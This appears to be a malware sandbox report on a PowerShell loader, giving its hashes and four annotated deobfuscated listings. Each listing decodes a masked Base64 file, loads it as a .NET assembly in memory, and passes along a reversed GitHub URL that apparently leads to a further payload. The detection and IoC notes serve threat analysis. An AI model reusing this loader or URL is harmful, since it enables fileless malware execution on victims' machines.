Malicious
Malicious

1c1562f348ee5f02bf27cd4de7c9ad52

PowerShell
MD5: 1c1562f348ee5f02bf27cd4de7c9ad52
Size: 1.31 KB
application/x-powershell
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
1c1562f348ee5f02bf27cd4de7c9ad52
Sha1
cd5db6c6bd3df6251b2d3ccea8c09a186391f4dd
Sha256
984ca97d34361cafaac92a5f2617931f3dd38ef71774eb29cf8a795a31ab3b6b
Sha384
53c46d3f895a931177bcb411f68d770d268a77ac4055f173fa4ca9481e5f16a26ed203fb5a90eeb238f1cd82cd3b0367
Sha512
8fbdfeae819fab11e04d51c0a50e138f04c4b38481e8269438b4241e615602b31a3b55065da0ea526d8b9272c8965ef405a1fbeaa1b02fe1aca60b587e923c46
SSDeep
24:Qlv4o4Kzyu52U/tMlBygklBRlB0P8wPMuZJBlBMwA6PFv+F5ThBmJ:A4oPtM7ktApDPwF5TH0
TLSH
8A21F310AAFC8E11BA73DB1987BAE08019767AEDED31CB0CC354C10C06AEA449C56F37
File Structure
1c1562f348ee5f02bf27cd4de7c9ad52
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
Value
Deobfuscated PowerShell

# Deobfuscated loader stage from the sandbox report (the report collapsed the statements onto one line).
# Flow: read a staged text file -> undo a character mask -> Base64-decode -> load the bytes as a
# .NET assembly inside the running PowerShell process -> call one method in it via reflection.
# Nothing in this listing writes the decoded assembly to disk, so at this stage there is no PE file to hash;
# PowerShell script block logging (event 4104) and AMSI are where this activity is visible.

# Reversed string. Read backwards it is:
#   hxxps://raw[.]githubusercontent[.]com/antoniovelez19881-bit/INVITADOS/refs/heads/main/2424GG.txt
# It is not reversed or fetched here, only passed on as an argument; presumably the loaded assembly
# reverses and downloads it - confirm by analysing the assembly.
$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth"
# Staged payload container. An earlier stage (not shown here) must have dropped this file; its presence is a host IoC.
$x = "C:\ProgramData\Lwoqo.txt"
$FloPf = (Get-Content -Path $x -Encoding "UTF8")
# The staged text has runs of '*' substituted for the letter "A"; restoring them yields valid Base64.
# The masking keeps the file from looking like (or decoding as) Base64 to a naive scanner.
$FloPf = $FloPf."replace"("*********************************", "A")
[Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf)
# In-memory assembly load plus reflective call of FjrD.LzKWm::WmJZZ.
# $yGpIW is never assigned in this listing, so it evaluates to $null, which is what reflection expects
# as the target of a static method.
# Arguments: the reversed URL, a .vbs path under the sandbox user's Temp directory, and four short strings
# whose meaning cannot be determined from this listing. The 64-hex-character .vbs name looks like the sandbox
# naming the parent script by its SHA-256 - confirm against the submission record.
# Quoted member names ("Load", "GetType", ...) are ordinary member access; a detection that keys on
# the unquoted spelling `.Load(` would miss this form.
[AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_3fc4b44fdddb35fc904b4aa619de1cacfe1f73490633e22fd163007fe59b2353.vbs", "____________________________________________-------", "0", "1", "caca")))

Deobfuscated PowerShell

# Second deobfuscator rendering of the same loader: read staged file, unmask, Base64-decode,
# load as a .NET assembly in-process, invoke FjrD.LzKWm::WmJZZ by reflection.

# Reversed URL on raw.githubusercontent.com (path ends in 2424GG.txt when read backwards); only passed on as an argument here.
$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth"
# Staged payload container; host IoC.
$x = "C:\ProgramData\Lwoqo.txt"
$FloPf = (Get-Content -Path $x -Encoding "UTF8")
# Restores the letter "A" that was masked with a run of '*' so the text becomes valid Base64.
$FloPf = $FloPf."replace"("*********************************", "A")
[Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf)
# NOTE(review): in this rendering the six arguments sit inside a script block `{ ... }`. As written that would
# hand the method a single ScriptBlock object instead of six strings, so this looks like an artefact of the
# deobfuscator's pass rather than what the sample executes - compare with the first listing in this report.
# $yGpIW is never assigned in this listing, so the invoke target is $null (static-method call).
[AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_3fc4b44fdddb35fc904b4aa619de1cacfe1f73490633e22fd163007fe59b2353.vbs", "____________________________________________-------", "0", "1", "caca") } )))

Deobfuscated PowerShell

# Third deobfuscator rendering of the same loader; it differs from the previous one only in that the
# redundant parentheses around the argument array have been dropped.

# Reversed URL on raw.githubusercontent.com; only passed on as an argument here.
$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth"
# Staged payload container; host IoC.
$x = "C:\ProgramData\Lwoqo.txt"
$FloPf = (Get-Content -Path $x -Encoding "UTF8")
# Undo the '*'-for-"A" masking so the content decodes as Base64.
$FloPf = $FloPf."replace"("*********************************", "A")
[Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf)
# In-memory assembly load and reflective call of FjrD.LzKWm::WmJZZ; the decoded bytes are not written to disk in this listing.
# NOTE(review): the `{ ... }` wrapper around the arguments would pass one ScriptBlock, not six strings;
# likely a deobfuscator artefact - the first listing in this report shows the plain argument array.
[AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_3fc4b44fdddb35fc904b4aa619de1cacfe1f73490633e22fd163007fe59b2353.vbs", "____________________________________________-------", "0", "1", "caca") } ))

Deobfuscated PowerShell

# Final deobfuscator rendering; identical to the listing before it, i.e. the deobfuscator reached a fixed point.

# Reversed URL on raw.githubusercontent.com; only passed on as an argument here.
$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth"
# Staged payload container; host IoC.
$x = "C:\ProgramData\Lwoqo.txt"
$FloPf = (Get-Content -Path $x -Encoding "UTF8")
# Undo the '*'-for-"A" masking so the content decodes as Base64.
$FloPf = $FloPf."replace"("*********************************", "A")
[Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf)
# In-memory assembly load and reflective call of FjrD.LzKWm::WmJZZ.
# Hunting pivots visible in this line: the type and method names, and the combination of
# FromBase64String with [AppDomain]::CurrentDomain.Load in a single script block.
# NOTE(review): the `{ ... }` wrapper around the arguments is likely a deobfuscator artefact - see the first listing in this report.
[AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_3fc4b44fdddb35fc904b4aa619de1cacfe1f73490633e22fd163007fe59b2353.vbs", "____________________________________________-------", "0", "1", "caca") } ))

1c1562f348ee5f02bf27cd4de7c9ad52 (1.31 KB)